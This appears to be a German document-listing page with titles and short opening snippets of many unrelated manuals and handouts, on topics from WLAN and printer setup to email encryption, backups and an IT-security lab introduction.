
Mehr

Benutzung der LS-Miniscanner

Benutzung der LS-Miniscanner Benutzung der LS-Miniscanner Seit Januar 2010 ist es möglich für bestimmte Vorgänge (Umlagerungen, Retouren, Inventur) die von LS lieferbaren Miniscanner im Format Autoschlüsselgröße zu benutzen. Diese

Mehr

Sichere E-Mail für Rechtsanwälte & Notare

Sichere E-Mail für Rechtsanwälte & Notare Die Technik verwendet die schon vorhandene Technik. Sie als Administrator müssen in der Regel keine neue Software und auch keine zusätzliche Hardware implementieren. Das bedeutet für Sie als Administrator

Mehr

WinVetpro im Betriebsmodus Laptop

WinVetpro im Betriebsmodus Laptop WinVetpro im Betriebsmodus Laptop Um Unterwegs Daten auf einem mobilen Gerät mit WinVetpro zu erfassen, ohne den Betrieb in der Praxis während dieser Zeit zu unterbrechen und ohne eine ständige Online

Mehr

WLAN Konfiguration. Michael Bukreus 2014. Seite 1

WLAN Konfiguration. Michael Bukreus 2014. Seite 1 WLAN Konfiguration Michael Bukreus 2014 Seite 1 Inhalt Begriffe...3 Was braucht man für PureContest...4 Netzwerkkonfiguration...5 Sicherheit...6 Beispielkonfiguration...7 Screenshots Master Accesspoint...8

Mehr

Elexis-BlueEvidence-Connector

Elexis-BlueEvidence-Connector Elexis-BlueEvidence-Connector Gerry Weirich 26. Oktober 2012 1 Einführung Dieses Plugin dient dazu, den Status Hausarztpatient zwischen der BlueEvidence- Anwendung und Elexis abzugleichen. Das Plugin markiert

Mehr

1) Farbsteuergerät in der Nikobus-Software unter Modul zufügen hinzufügen.

1) Farbsteuergerät in der Nikobus-Software unter Modul zufügen hinzufügen. Programmierung des Farbsteuergeräts 340-00112 für Nikobus Diese Bedienungsanleitung gilt auch für die Nikobus-Produkte 340-00111 und 340-00113. Achtung: einige der aufgeführten Betriebsarten sind nur auf

Mehr

Kommentartext Medien sinnvoll nutzen

Kommentartext Medien sinnvoll nutzen Kommentartext Medien sinnvoll nutzen 1. Kapitel: Wir alle nutzen Medien Das ist ein Computer. Und da ist einer. Auch das hier ist ein Computer. Wir alle kennen Computer und haben vielleicht auch schon

Mehr

Anleitung zur Installation des Printservers

Anleitung zur Installation des Printservers Anleitung zur Installation des Printservers 1. Greifen Sie per Webbrowser auf die Konfiguration des DIR-320 zu. Die Standard Adresse ist http://192.168.0.1. 2. Im Auslieferungszustand ist auf die Konfiguration

Mehr

Lineargleichungssysteme: Additions-/ Subtraktionsverfahren

Lineargleichungssysteme: Additions-/ Subtraktionsverfahren Lineargleichungssysteme: Additions-/ Subtraktionsverfahren W. Kippels 22. Februar 2014 Inhaltsverzeichnis 1 Einleitung 2 2 Lineargleichungssysteme zweiten Grades 2 3 Lineargleichungssysteme höheren als

Mehr

Speicher in der Cloud

Speicher in der Cloud Speicher in der Cloud Kostenbremse, Sicherheitsrisiko oder Basis für die unternehmensweite Kollaboration? von Cornelius Höchel-Winter 2013 ComConsult Research GmbH, Aachen 3 SYNCHRONISATION TEUFELSZEUG

Mehr

Windows Vista Security

Windows Vista Security Marcel Zehner Windows Vista Security ISBN-10: 3-446-41356-1 ISBN-13: 978-3-446-41356-6 Leseprobe Weitere Informationen oder Bestellungen unter http://www.hanser.de/978-3-446-41356-6 sowie im Buchhandel

Mehr

, dadurch wird der andere Modus eingestellt, also es sieht dann so aus

, dadurch wird der andere Modus eingestellt, also es sieht dann so aus Hier finden Sie ein von mir empfohlenes Programm. Es heißt: ESET Smart Security 4 Sie finden hierzu nähere Information im Internet unter: https://www.eset.de/produkte/eset-smart-security/ Funktion des

Mehr

Anleitung über den Umgang mit Schildern

Anleitung über den Umgang mit Schildern Anleitung über den Umgang mit Schildern -Vorwort -Wo bekommt man Schilder? -Wo und wie speichert man die Schilder? -Wie füge ich die Schilder in meinen Track ein? -Welche Bauteile kann man noch für Schilder

Mehr

Lizenzen auschecken. Was ist zu tun?

Lizenzen auschecken. Was ist zu tun? Use case Lizenzen auschecken Ihr Unternehmen hat eine Netzwerk-Commuterlizenz mit beispielsweise 4 Lizenzen. Am Freitag wollen Sie Ihren Laptop mit nach Hause nehmen, um dort am Wochenende weiter zu arbeiten.

Mehr

Handbuch : CTFPND-1 V4

Handbuch : CTFPND-1 V4 Handbuch : CTFPND-1 V4 - Navigation starten (Seite 1) - Einstellungen (Seite 2-17) - WindowsCE Modus (Seite 18-19) - Bluetooth (Seite 21-24) - Anschlussmöglichkeiten (Seite 25-26) Navigation Um die installierte

Mehr

Karten-Freischaltung mit dem UNLOCK MANAGER

Karten-Freischaltung mit dem UNLOCK MANAGER Karten-Freischaltung mit dem UNLOCK MANAGER WICHTIGE INFORMATION 1. Anzahl der Freischaltungen Die Karten können zweimal freigeschaltet werden. (z. B. Map Manager auf PC plus Map Manager auf Laptop oder

Mehr

Das Roaming Cockpit. Inhalt. 1 Das Roaming Cockpit... 2. 2 Aufrufen des Roaming Cockpit über den Browser... 3

Das Roaming Cockpit. Inhalt. 1 Das Roaming Cockpit... 2. 2 Aufrufen des Roaming Cockpit über den Browser... 3 Das Roaming Cockpit Inhalt 1 Das Roaming Cockpit... 2 2 Aufrufen des Roaming Cockpit über den Browser... 3 3 Aufruf über Unlimited Data Manager (Data SIM Karten)... 3 4 Anmeldung im Roaming Cockpit mit

Mehr

Mailbox Ihr Anrufbeantworter im primacom-netz Anleitung. Inhaltsverzeichnis. 1 Mailbox einrichten. 1.1 Ersteinrichtung. 1.

Mailbox Ihr Anrufbeantworter im primacom-netz Anleitung. Inhaltsverzeichnis. 1 Mailbox einrichten. 1.1 Ersteinrichtung. 1. Sehr geehrter Telefonkunde, wir möchten Ihnen mit dieser Bedienungsanleitung eine Hilfestellung bei der Einrichtung und Bedienung Ihrer Mailbox für Ihren Telefonanschluss geben. Die Mailbox - Ihr Anrufbeantworter

Mehr

easyident Türöffner easyident Türöffner Art. Nr. FS-0007 FS Fertigungsservice

easyident Türöffner easyident Türöffner Art. Nr. FS-0007 FS Fertigungsservice easyident Türöffner Art. Nr. FS-0007 Wir freuen uns, das sie sich für unser Produkt easyident Türöffner, mit Transponder Technologie entschieden haben. Easyident Türöffner ist für Unterputzmontage in 55mm

Mehr

Mail-Signierung und Verschlüsselung

Mail-Signierung und Verschlüsselung Mail-Signierung und Verschlüsselung ab Release-Version 2013.02, ein kostenlos zur Verfügung gestelltes Feature! Elektronische Post ist aus unserem privaten und beruflichen Leben nicht mehr wegzudenken.

Mehr

Matrix42. Use Case - Sicherung und Rücksicherung persönlicher Einstellungen über Personal Backup. Version 1.0.0. 23. September 2015 - 1 -

Matrix42. Use Case - Sicherung und Rücksicherung persönlicher Einstellungen über Personal Backup. Version 1.0.0. 23. September 2015 - 1 - Matrix42 Use Case - Sicherung und Rücksicherung persönlicher Version 1.0.0 23. September 2015-1 - Inhaltsverzeichnis 1 Einleitung 3 1.1 Beschreibung 3 1.2 Vorbereitung 3 1.3 Ziel 3 2 Use Case 4-2 - 1 Einleitung

Mehr

Handbuch. NAFI Online-Spezial. Kunden- / Datenverwaltung. 1. Auflage. (Stand: 24.09.2014)

Handbuch. NAFI Online-Spezial. Kunden- / Datenverwaltung. 1. Auflage. (Stand: 24.09.2014) Handbuch NAFI Online-Spezial 1. Auflage (Stand: 24.09.2014) Copyright 2016 by NAFI GmbH Unerlaubte Vervielfältigungen sind untersagt! Inhaltsangabe Einleitung... 3 Kundenauswahl... 3 Kunde hinzufügen...

Mehr

Tipps und Tricks zu den Updates

Tipps und Tricks zu den Updates Tipps und Tricks zu den Updates Grundsätzlich können Sie Updates immer auf 2 Wegen herunterladen, zum einen direkt über unsere Internetseite, zum anderen aus unserer email zu einem aktuellen Update. Wenn

Mehr

Zwischenablage (Bilder, Texte,...)

Zwischenablage (Bilder, Texte,...) Zwischenablage was ist das? Informationen über. die Bedeutung der Windows-Zwischenablage Kopieren und Einfügen mit der Zwischenablage Vermeiden von Fehlern beim Arbeiten mit der Zwischenablage Bei diesen

Mehr

Nokia Handy - Daten sichern.

Nokia Handy - Daten sichern. Nokia Handy - Daten sichern. Inhaltsvereichnis Was brauche ich dazu:... 2 Nokia PC Suite.... 2 Genauer kann man allerdings so sichern!!!!!!... 6 Bluetooth Verbindung... 6 Sichern... 7 Dateimanager... 8

Mehr

HANDBUCH PHOENIX II - DOKUMENTENVERWALTUNG

HANDBUCH PHOENIX II - DOKUMENTENVERWALTUNG it4sport GmbH HANDBUCH PHOENIX II - DOKUMENTENVERWALTUNG Stand 10.07.2014 Version 2.0 1. INHALTSVERZEICHNIS 2. Abbildungsverzeichnis... 3 3. Dokumentenumfang... 4 4. Dokumente anzeigen... 5 4.1 Dokumente

Mehr

Installation von Druckern auf dem ZOVAS-Notebook. 1. Der Drucker ist direkt mit dem Notebook verbunden

Installation von Druckern auf dem ZOVAS-Notebook. 1. Der Drucker ist direkt mit dem Notebook verbunden Installation von Druckern auf dem ZOVAS-Notebook Bei der Installation eines Druckers muss grundsätzlich unterschieden werden, ob der Drucker direkt am Notebook angeschlossen ist oder ob ein Drucker verwendet

Mehr

http://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0

http://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0 http://bitschmiede.com post@bitschmiede.com Drucken von Webseiten Eine Anleitung, Version 1.0 Drucken von Webseiten Autor: Christian Heisch Technischer Verantwortlicher für die Webseitenumsetzung bei

Mehr

Anleitung zur Installation des EPSON TM-m30 WLAN Moduls

Anleitung zur Installation des EPSON TM-m30 WLAN Moduls Anleitung zur Installation des EPSON TM-m30 WLAN Moduls Dieses Dokument leitet Sie durch den Installationsprozess des WLAN Moduls für den EPSON TMm30 (nachstehend Bondrucker ). Es wird davon ausgegangen,

Mehr

Auto-Provisionierung tiptel 31x0 mit Yeastar MyPBX

Auto-Provisionierung tiptel 31x0 mit Yeastar MyPBX Allgemeines Auto-Provisionierung tiptel 31x0 mit Yeastar MyPBX Stand 19.09.2014 Die Yeastar MyPBX Telefonanlagen unterstützen die automatische Konfiguration der tiptel 3110, tiptel 3120 und tiptel 3130

Mehr

Eigene Dokumente, Fotos, Bilder etc. sichern

Eigene Dokumente, Fotos, Bilder etc. sichern Eigene Dokumente, Fotos, Bilder etc. sichern Solange alles am PC rund läuft, macht man sich keine Gedanken darüber, dass bei einem Computer auch mal ein technischer Defekt auftreten könnte. Aber Grundsätzliches

Mehr

Öffnen Sie den Internet-Browser Ihrer Wahl. Unabhängig von der eingestellten Startseite erscheint die folgende Seite in Ihrem Browserfenster:

Öffnen Sie den Internet-Browser Ihrer Wahl. Unabhängig von der eingestellten Startseite erscheint die folgende Seite in Ihrem Browserfenster: Schritt 1: Verbinden Sie Ihr wireless-fähiges Gerät (Notebook, Smartphone, ipad u. ä.) mit dem Wireless-Netzwerk WiFree_1. Die meisten Geräte zeigen Wireless-Netzwerke, die in Reichweite sind, automatisch

Mehr

Mobile Intranet in Unternehmen

Mobile Intranet in Unternehmen Mobile Intranet in Unternehmen Ergebnisse einer Umfrage unter Intranet Verantwortlichen aexea GmbH - communication. content. consulting Augustenstraße 15 70178 Stuttgart Tel: 0711 87035490 Mobile Intranet

Mehr

ACHTUNG: Es können gpx-dateien und mit dem GP7 aufgezeichnete trc-dateien umgewandelt werden.

ACHTUNG: Es können gpx-dateien und mit dem GP7 aufgezeichnete trc-dateien umgewandelt werden. Track in Route umwandeln ACHTUNG: Ein Track kann nur dann in eine Route umgewandelt werden, wenn der Track auf Wegen gefahren wurde. Ein Querfeldein-Track kann nicht in eine Route umgewandelt werden, da

Mehr

DELFI. Benutzeranleitung Dateiversand für unsere Kunden. Grontmij GmbH. Postfach 34 70 17 28339 Bremen. Friedrich-Mißler-Straße 42 28211 Bremen

DELFI. Benutzeranleitung Dateiversand für unsere Kunden. Grontmij GmbH. Postfach 34 70 17 28339 Bremen. Friedrich-Mißler-Straße 42 28211 Bremen Grontmij GmbH Postfach 34 70 17 28339 Bremen Friedrich-Mißler-Straße 42 28211 Bremen T +49 421 2032-6 F +49 421 2032-747 E info@grontmij.de W www.grontmij.de DELFI Benutzeranleitung Dateiversand für unsere

Mehr

Erleben Sie die kostbarsten Momente mit Wireless-Hörsystemen

Erleben Sie die kostbarsten Momente mit Wireless-Hörsystemen Erleben Sie die kostbarsten Momente mit Wireless-Hörsystemen Genießen Anna und Oskar diese Party? Oskar versteht manchmal die Welt nicht mehr Das Hörvermögen von Oskar hat nachgelassen. Er verlässt die

Mehr

Wie verbindet man Nokia 6600 mit Oxygen Phone Manager II for Symbian OS phones ( http://www.opm-2.com/symbian/ )

Wie verbindet man Nokia 6600 mit Oxygen Phone Manager II for Symbian OS phones ( http://www.opm-2.com/symbian/ ) Wie verbindet man Nokia 6600 mit Oxygen Phone Manager II for Symbian OS phones ( http://www.opm-2.com/symbian/ ) Falls Sie Ihr Telefon mit dem Rechner paarsweise schon verbunden haben, bitte sehen Sie

Mehr

RS-Flip Flop, D-Flip Flop, J-K-Flip Flop, Zählschaltungen

RS-Flip Flop, D-Flip Flop, J-K-Flip Flop, Zählschaltungen Elektronik Praktikum / Digitaler Teil Name: Jens Wiechula, Philipp Fischer Leitung: Prof. Dr. U. Lynen Protokoll: Philipp Fischer Versuch: 3 Datum: 24.06.01 RS-Flip Flop, D-Flip Flop, J-K-Flip Flop, Zählschaltungen

Mehr

Webalizer HOWTO. Stand: 18.06.2012

Webalizer HOWTO. Stand: 18.06.2012 Webalizer HOWTO Stand: 18.06.2012 Copyright 2003 by manitu. Alle Rechte vorbehalten. Alle verwendeten Bezeichnungen dienen lediglich der Kennzeichnung und können z.t. eingetragene Warenzeichen sein, ohne

Mehr

AutoCAD 2007 - Dienstprogramm zur Lizenzübertragung

AutoCAD 2007 - Dienstprogramm zur Lizenzübertragung AutoCAD 2007 - Dienstprogramm zur Lizenzübertragung Problem: Um AutoCAD abwechselnd auf mehreren Rechnern einsetzen zu können konnte man bis AutoCAD 2000 einfach den Dongle umstecken. Seit AutoCAD 2000i

Mehr

Inhalt. Allgemeine Einführung. Argumentationsvermögen. Räumliches Vorstellungsvermögen. Begabungen und Fähigkeiten messen

Inhalt. Allgemeine Einführung. Argumentationsvermögen. Räumliches Vorstellungsvermögen. Begabungen und Fähigkeiten messen Beispielheft Inhalt Allgemeine Einführung Test Eins: Test Zwei: Test Drei: Test Vier: Test Fünf: Argumentationsvermögen Auffassungsvermögen Zahlenvermögen Sprachverständnis Räumliches Vorstellungsvermögen

Mehr

Multimedia und Datenkommunikation

Multimedia und Datenkommunikation Multimedia und Datenkommunikation Einteilung in Unterpunkte Netzwerk Audioausgabe Internetzugang Basis des Projektes Büro 5 Mitarbeiter Datenaustausch via Diskette Kein Netzwerk Ein Nadeldrucker Netzwerke

Mehr

Installation LehrerConsole (für Version 6.2)

Installation LehrerConsole (für Version 6.2) Dr. Kaiser Systemhaus GmbH Köpenicker Straße 325 12555 Berlin Telefon: (0 30) 65 76 22 36 Telefax: (0 30) 65 76 22 38 E-Mail: info@dr-kaiser.de Internet: www.dr-kaiser.de Installation LehrerConsole (für

Mehr

ecaros2 - Accountmanager

ecaros2 - Accountmanager ecaros2 - Accountmanager procar informatik AG 1 Stand: FS 09/2012 Inhaltsverzeichnis 1 Aufruf des ecaros2-accountmanager...3 2 Bedienung Accountmanager...4 procar informatik AG 2 Stand: FS 09/2012 1 Aufruf

Mehr

Praktikum IT-Sicherheit

Praktikum IT-Sicherheit IT-Sicherheit Praktikum IT-Sicherheit - Versuchshandbuch - Aufgaben Angriffstechniken In diesem Versuch werden verschiedene Angriffstechniken anhand von Beispielen vorgestellt. Die Ausarbeitung der Übungen

Mehr

Kurzanleitung IP-Kamera AMGO IP 80 für Livebilder auf Smartphone/Iphone und PC

Kurzanleitung IP-Kamera AMGO IP 80 für Livebilder auf Smartphone/Iphone und PC Kurzanleitung IP-Kamera AMGO IP 80 für Livebilder auf Smartphone/Iphone und PC 02/02/2014 (02) 27/01/2015 (01) Inhalt 1. Grundinstallation... 2 1.1 Kameraapp installieren... 2 1.2 Livebilder abrufen über

Mehr

Erweiterungen Webportal

Erweiterungen Webportal Erweiterungen Webportal Adress-Suche Inaktive Merkmale und gelöschte Adresse Die Suche im Webportal wurde so erweitert, dass inaktive Adresse (gelöscht) und inaktive Merkmale bei der Suche standardmässig

Mehr

Installations Guide für YAJSW und DTLDAP

Installations Guide für YAJSW und DTLDAP YAJSW - DTLDAP Installation Guide Installations Guide für YAJSW und DTLDAP Erstellt für: Helsana AG, Franz Schnyder Erstellt von: Skypro AG, Thomas Bucher 9. Mai 2013 thomas@skypro.ch http://www.skypro.ch

Mehr

CD einlegen (Moment warten) Die Aktion markieren, die durchgeführt werden soll. (in diesem Beispiel»Audio-CD-Wiedergabe)

CD einlegen (Moment warten) Die Aktion markieren, die durchgeführt werden soll. (in diesem Beispiel»Audio-CD-Wiedergabe) D abspielen Ds lassen sich sehr einfach über den Windows Media Player abspielen. Der schaltet sich nämlich automatisch ein. Das heißt im Klartext: Lautsprecher einschalten, D einlegen, und schon geht s

Mehr

Professionelle Seminare im Bereich MS-Office

Professionelle Seminare im Bereich MS-Office Der Name BEREICH.VERSCHIEBEN() ist etwas unglücklich gewählt. Man kann mit der Funktion Bereiche zwar verschieben, man kann Bereiche aber auch verkleinern oder vergrößern. Besser wäre es, die Funktion

Mehr

Simulation LIF5000. Abbildung 1

Simulation LIF5000. Abbildung 1 Simulation LIF5000 Abbildung 1 Zur Simulation von analogen Schaltungen verwende ich Ltspice/SwitcherCAD III. Dieses Programm ist sehr leistungsfähig und wenn man weis wie, dann kann man damit fast alles

Mehr

LED WIFI Controller - Bedienungsanleitung

LED WIFI Controller - Bedienungsanleitung LED WIFI Controller - Bedienungsanleitung Inhaltsverzeichnis 1. Übersicht...1 2. Software/Technische Daten...2 3. Software für Android...2 3.01 Installationsanleitung...2 3.02 WiFi Verbindungseinstellungen...3

Mehr

Technische Informationen zum Webmail, bereitgestellt durch den Landesverband der Freiwilligen Feuerwehren Südtirols.

Technische Informationen zum Webmail, bereitgestellt durch den Landesverband der Freiwilligen Feuerwehren Südtirols. Technische Informationen zum Webmail, bereitgestellt durch den Landesverband der Freiwilligen Feuerwehren Südtirols. 1. Wie kann man die Mails vom PC direkt abrufen? Bei bestehender Internetverbindung

Mehr

Bedienungsanleitung Anrufbeantworter für digitale Telefone Alcatel 4039

Bedienungsanleitung Anrufbeantworter für digitale Telefone Alcatel 4039 Bedienungsanleitung Anrufbeantworter für digitale Telefone Alcatel 4039 Inhaltsverzeichnis Version 09/10 1 Einleitung 3 2 Erstaktivierung des Anrufbeantworters 5 2.1 Erläuterungen der einzelnen Schritte

Mehr

FTP-Leitfaden RZ. Benutzerleitfaden

FTP-Leitfaden RZ. Benutzerleitfaden FTP-Leitfaden RZ Benutzerleitfaden Version 1.4 Stand 08.03.2012 Inhaltsverzeichnis 1 Einleitung... 3 1.1 Zeitaufwand... 3 2 Beschaffung der Software... 3 3 Installation... 3 4 Auswahl des Verbindungstyps...

Mehr

1. Einführung 2. 2. Erstellung einer Teillieferung 2. 3. Erstellung einer Teilrechnung 6

1. Einführung 2. 2. Erstellung einer Teillieferung 2. 3. Erstellung einer Teilrechnung 6 Inhalt 1. Einführung 2 2. Erstellung einer Teillieferung 2 3. Erstellung einer Teilrechnung 6 4. Erstellung einer Sammellieferung/ Mehrere Aufträge zu einem Lieferschein zusammenfassen 11 5. Besonderheiten

Mehr

Installationsanleitung Sander und Doll Mobilaufmaß. Stand 22.04.2003

Installationsanleitung Sander und Doll Mobilaufmaß. Stand 22.04.2003 Installationsanleitung Sander und Doll Mobilaufmaß Stand 22.04.2003 Sander und Doll AG Installationsanleitung Sander und Doll Mobilaufmaß Inhalt 1 Voraussetzungen...1 2 ActiveSync...1 2.1 Systemanforderungen...1

Mehr

it Symbiose Software Installation 1 Installationsbeschreibung für alle Series 60 (S60) Geräte - im speziellen Nokia S60-3rd Edition Stand März 2007

it Symbiose Software Installation 1 Installationsbeschreibung für alle Series 60 (S60) Geräte - im speziellen Nokia S60-3rd Edition Stand März 2007 Software Installation 1 1. Softwareempfang auf Ihrem Endgerät Nach erfolgter Freischaltung in unserem System erhalten Sie von uns 3 SMS zugesandt. Folgende Mitteilungen werden an Ihr Endgerät zum Versandt

Mehr

Dokumentation PuSCH App. android phone

Dokumentation PuSCH App. android phone Dokumentation PuSCH App android phone Inhaltsverzeichnis Mit dem PuSCH App am Smartphone wird das Bestellen deutlich vereinfacht und beschleunigt! Die PuSCH App ist eine mobile Erweiterung zum Partnerportal

Mehr

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank

mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank mysql - Clients MySQL - Abfragen eine serverbasierenden Datenbank In den ersten beiden Abschnitten (rbanken1.pdf und rbanken2.pdf) haben wir uns mit am Ende mysql beschäftigt und kennengelernt, wie man

Mehr

Bereich METIS (Texte im Internet) Zählmarkenrecherche

Bereich METIS (Texte im Internet) Zählmarkenrecherche Bereich METIS (Texte im Internet) Zählmarkenrecherche Über die Zählmarkenrecherche kann man nach der Eingabe des Privaten Identifikationscodes einer bestimmten Zählmarke, 1. Informationen zu dieser Zählmarke

Mehr

Kurzanleitung für das Bezahlen mit dem Kartenlesegerät von VASCO girocard im Internet

Kurzanleitung für das Bezahlen mit dem Kartenlesegerät von VASCO girocard im Internet Kurzanleitung für das Bezahlen mit dem Kartenlesegerät von VASCO girocard im Internet Herzlich willkommen Mit Ihrer girocard und Ihrem persönlichen Kartenlesegerät bezahlen Sie jetzt auch im Internet so

Mehr

Software zur Online-Aktualisierung der Firmware/Gerätesoftware eines Garmin GPS-Empfängers

Software zur Online-Aktualisierung der Firmware/Gerätesoftware eines Garmin GPS-Empfängers 48 15 00 N 11 38 04 E WebUpdater Software zur Online-Aktualisierung der Firmware/Gerätesoftware eines Garmin GPS-Empfängers Installation und Bedienung Garmin Deutschland GmbH Parkring 35 D-85748 Garching

Mehr

Externe Abfrage von E-Mail für Benutzer der HSA über Mozilla-Thunderbird

Externe Abfrage von E-Mail für Benutzer der HSA über Mozilla-Thunderbird Externe Abfrage von E-Mail für Benutzer der HSA über Mozilla-Thunderbird Vorweg zunächst einige allgemeine Worte: Sie müssen über einen Account bei uns verfügen und ein E-Mail-Postfach bei uns haben. Dann

Mehr

Wie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann.

Wie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann. Wie man Registrationen und Styles von Style/Registration Floppy Disketten auf die TYROS-Festplatte kopieren kann. Einleitung Es kommt vor, dass im Handel Disketten angeboten werden, die Styles und Registrationen

Mehr

ways2gether ipad App Guide

ways2gether ipad App Guide 1 ways2gether ios App Guide ways2gether ipad App Guide Dieses Dokument beschreibt den Umgang mit der Augmented Reality App, die im Projekt ways2gether entstanden ist. Voraussetzungen: ipad 2 oder 3 mit

Mehr

Datenbanken Kapitel 2

Datenbanken Kapitel 2 Datenbanken Kapitel 2 1 Eine existierende Datenbank öffnen Eine Datenbank, die mit Microsoft Access erschaffen wurde, kann mit dem gleichen Programm auch wieder geladen werden: Die einfachste Methode ist,

Mehr

Einrichten einer mehrsprachigen Webseite mit Joomla (3.3.6)

Einrichten einer mehrsprachigen Webseite mit Joomla (3.3.6) Einrichten einer mehrsprachigen Webseite mit Joomla (3.3.6) 1. Loggen Sie sich im Administratorbereich ein und gehen Sie auf Extension > Extension Manager 2. Wählen Sie Install languages 3. Klicken Sie

Mehr

MC-Hx 006. Einbindung des MC-Hx Modul als MODBus TCP Slave. MB DataTec GmbH. Stand: 01.2013

MC-Hx 006. Einbindung des MC-Hx Modul als MODBus TCP Slave. MB DataTec GmbH. Stand: 01.2013 Einbindung des MC-Hx Modul als MODBus TCP Slave MB DataTec GmbH Stand: 01.2013 Kontakt: MB DataTec GmbH Friedrich Ebert Str. 217a 58666 Kierspe Tel.: 02359 2973-22, Fax 23 Web : www.mb-datatec.de e-mail:

Mehr

Verschlüsselung mit PGP. Teil 1: Installation

Verschlüsselung mit PGP. Teil 1: Installation Verschlüsselung mit PGP Teil 1: Installation Burkhard Messer FHTW Berlin FB 4 Wirtschaftsinformatik Verschlüsselung mit PGP - Teil 1/Installation 04.04.2006 1 Version Es steht das mehr oder weniger freie

Mehr